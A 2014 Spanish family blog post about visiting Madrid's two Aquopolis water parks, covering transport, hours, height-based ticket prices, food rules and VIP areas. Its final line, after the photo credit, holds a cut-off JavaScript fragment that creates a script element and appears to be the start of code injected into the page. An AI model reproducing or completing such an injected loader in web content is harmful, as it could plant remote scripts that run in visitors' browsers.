¡Al agua patos en el Aquópolis de Madrid!

22/07/2014

Last days of summer and vacation in a waterpark

Con la llegada de la época estival los parques acuáticos están más solicitados que nunca. El buen tiempo es fundamental. Y sin duda alguna, es uno de los planes familiares más apetecibles y divertidos durante las vacaciones de verano. Así que, es el momento de hablar de otro de esos planes perfectos para los peques en Madrid. Además, la periferia madrileña cuenta con dos parques acuáticos: el Aquopolis de Villanueva de la Cañada y el Aquopolis de San Fernando de Henares. Y las dos son buenas opciones.

El acceso a cualquiera de los dos parques es bastante sencillo. Si llevas tu propio coche, en las webs encontrarás las indicaciones oportunas para llegar sin ningún problema. Si decides utilizar transporte público infórmate con antelación de horarios y puntos de salida. Te adelanto que para llegar a San Fernando dispones de servicio de autobús y de tren. Sin embargo para acceder al de Villanueva, tan solo de autobús.

El horario de los dos parques es similar aunque no exactamente igual. En las webs tienes los calendarios con los días de apertura y sus correspondientes horarios de apertura. Para que te vayas haciendo una idea, un fin de semana de julio, tanto en Villanueva como en San Fernando, su horario es de 12:00 am a 20:00 pm.

El precio de entrada varía según altura (de los 0,90 metros a los 1,40 metros hablamos de la tarifa junior, con menos de 0,90 metros la entrada es gratuita, y a partir de los 1,40 metros se considera ya una entrada adulta). También debes tener en cuenta que si realizas tu compra de entradas on line podrás disfrutar de descuentos y te ahorrarás las colas del parque.

El parque cuenta con servicios de restauración. Incluso tienes la opción de llevar planeado desde casa lo que allí vas a comer, comprando un menú de comida rápida desde la web. No obstante, es importante que sepas que la entrada con comida está permitida. Y lo que sobran son áreas donde montar tu propio picnic. Eso sí, abstente de transportar la comida en latas o recipientes de cristal, están prohibidos. Y si te estás planteando salir a comer fuera, que sepas que solo te puedes ausentar del parque durante un máximo de 20 minutos. De lo contrario, tendrás que abonar la entrada íntegra nuevamente.

Flotadores, tumbonas y taquillas. Tres cosas bien importantes a la hora de disfrutar una jornada en cualquiera de los dos parques. Debes tener en cuenta que el precio de la entrada únicamente incluye el servicio de flotadores. Si deseas tumbonas y/o taquillas deberás alquilarlas una vez dentro. (Igualmente, también existe la posibilidad de que alquiles tu propio flotador si así lo deseas).

Atracciones. Las opciones de toboganes son infinitas. Incluso están organizados por zonas, existiendo un área infantil, idónea para que los peques se diviertan a sus anchas. No lo dudes, si vas con niños, acércate a esta zona nada más llegar, ellos te lo agradecerán 🙂

Si buscas divertirte pero dentro de una cierta calma y tranquilidad, te encantará la opción Vip de los parques. Se trata de unas zonas ubicadas en las mejores áreas del parque, perfectas para tomar el sol y descansar un rato con toda la intimidad del mundo y sin el ajetreo constante del Aquopolis. Tumbonas, brezos -cuya sombra es ideal para comer si así lo deseas- y una consigna con llave, son las claves de estas 18 estancias privadas que el parque pone a tu disposición. Si deseas contratar este servicio hazlo al llegar al parque, en el punto de información.

¿Nos vamos a dar un chapuzón?

 Foto | Jobopavar d=document;var s=d.createElement(‘script’);